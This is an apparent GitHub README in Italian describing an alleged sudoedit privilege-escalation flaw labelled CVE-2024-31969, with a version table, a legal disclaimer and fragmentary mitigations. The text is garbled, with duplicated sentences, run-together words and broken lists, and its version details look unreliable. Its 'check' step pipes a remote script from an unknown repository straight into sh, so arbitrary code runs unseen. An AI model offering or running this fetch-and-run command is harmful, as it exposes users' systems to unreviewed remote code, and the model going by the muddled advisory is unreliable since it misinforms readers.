
CVE-2024-31969 è un privilege escalation locale in sudo quando si utilizza sudoedit.
CVE-2024-31969 è una vulnerabilità di escalation dei privilegi locale in sudo quando si utilizza il comando sudoedit.
Questa vulnerabilità è stata introdotta a partire da sudo 1.9.0 a causa del modo in cui sudoedit validava le variabili d'ambiente dell'utente e la proprietà dei file in modo non corretto.
Un difetto introdotto in sudo 1.9.0 nel modo in cui
sudoeditvalidava le variabili d'ambiente degli utenti e la proprietà dei file.
Questa vulnerabilità consente a un utente locale con accesso a sudoedit di modificare file arbitrari come root manipolando variabili d'ambiente come SUDO_EDITOR o sfruttando symlink.
| Versione di Sudo | Stato |
|---|---|
| 1.9.0 → 1.9.15p4 | 🔥 Vulnerabile |
| 1.9.15p5 e successive | ✅ Sicuro |
| 1.8.x (incluse 1.8.23) | ❌ Non interessato |
Esegui il seguente comando:
curl -L https://raw.githubusercontent.com/kingfakee7/CVE-2024-31969/main/cve-2024-31969-check.sh | sh
sudo alla versione 1.9.15p5 o successiva.sudoers che consentono sudoedit agli utenti non root.env_keep o env_reset nel file /etc/sudoers.Questa repository è stata creata a scopo educativo e di documentazione sulla sicurezza dei sistemi.
È severamente vietato utilizzare queste informazioni per attività illegali o senza il permesso scritto del proprietario del sistema.
Qualsiasi forma di abuso è completamente al di fuori della responsabilità dell'autore.